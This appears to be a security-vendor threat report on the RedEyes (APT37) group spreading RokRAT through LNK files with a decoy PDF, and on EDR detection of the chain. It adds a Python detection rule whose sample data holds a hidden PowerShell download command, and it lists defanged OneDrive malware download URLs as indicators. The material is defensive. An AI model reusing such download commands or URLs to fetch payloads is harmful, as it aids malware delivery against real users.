AhnLab Security Emergency response Center (ASEC) has previously shared information about the RedEyes threat group (also known as APT37 and ScarCruft), which distributed CHM malware disguised as a security email from a Korean financial company last month.
The LNK file contains a PowerShell command that creates script files, together with a normal PDF file, in the temp path and executes them. The user sees only the normal PDF open and is unaware of the malicious behavior running alongside it.
When a malicious LNK file is delivered to a user's system and executed, AhnLab EDR detects the suspicious PowerShell command execution as follows:
Clicking on cmd.exe in the figure shown above displays the execution history of the .bat file and the command it contains, as shown below.
If the suspicious execution of a PowerShell.exe command via a batch (.bat) file is detected, the user can identify the host and the logged-in account that executed the command by checking the host information in the top-right corner.
As shown in the figure below, it is possible to confirm the download URL used to install additional malware if the PC in question is investigated further.
If suspicious logs are confirmed, administrators can respond using the EDR features that terminate the processes involved and isolate the affected system from the network.
RokRAT has been distributed continuously for some time, and as the case above shows, it also opens a normal file, making it difficult for users to notice the infection. EDR products capable of detecting and responding to suspicious behavior are needed to handle malware as it continues to evolve.
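The behavior chain the post describes (a .bat file launched from the temp path via cmd.exe, spawning PowerShell that downloads from a OneDrive share URL) can be expressed as a simple process-tree rule. The following is an added example, not ASEC's or AhnLab EDR's detection logic; the process-creation events and the OneDrive share token are constructed for illustration.

```python
import re

# Constructed process-creation events (pid, ppid, image, command line) modelled on the
# chain described above. The OneDrive share token is a placeholder, not a real IoC.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\report.bat"'},
    {"pid": 4133, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr https://api.onedrive.com/v1.0/shares/u!PLACEHOLDER/root/content"'},
    # Benign admin script: cmd.exe runs a .bat outside the temp path, no OneDrive download.
    {"pid": 5000, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Scripts\backup.bat"'},
    {"pid": 5010, "ppid": 5000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# A .bat file executed from a user or system temp directory.
TEMP_BAT = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\[^\"']+\.bat\b", re.IGNORECASE)
# Download via the OneDrive share API endpoint used in the post's IoCs.
ONEDRIVE_SHARE = re.compile(r"api\.onedrive\.com/v1\.0/shares/u!", re.IGNORECASE)


def find_suspicious_chains(events):
    """Return PowerShell processes whose parent is cmd.exe and that match the chain above."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not e["image"].lower().endswith("\\powershell.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or not parent["image"].lower().endswith("\\cmd.exe"):
            continue
        reasons = []
        if TEMP_BAT.search(parent["cmdline"]):
            reasons.append("batch file launched from temp path")
        if ONEDRIVE_SHARE.search(e["cmdline"]):
            reasons.append("download via OneDrive share API")
        if reasons:
            findings.append({"pid": e["pid"], "parent_pid": parent["pid"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"PID {f['pid']} (parent {f['parent_pid']}): " + "; ".join(f["reasons"]))
```

Only the temp-path chain is reported; the backup script run from C:\Scripts produces no finding, which is the distinction an analyst wants before terminating processes or isolating the host.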
Download URLs:
hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content
hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content
More details about AhnLab EDR, which actively tracks threats and provides endpoint visibility through behavior-based detection and analysis, can be found on the AhnLab page.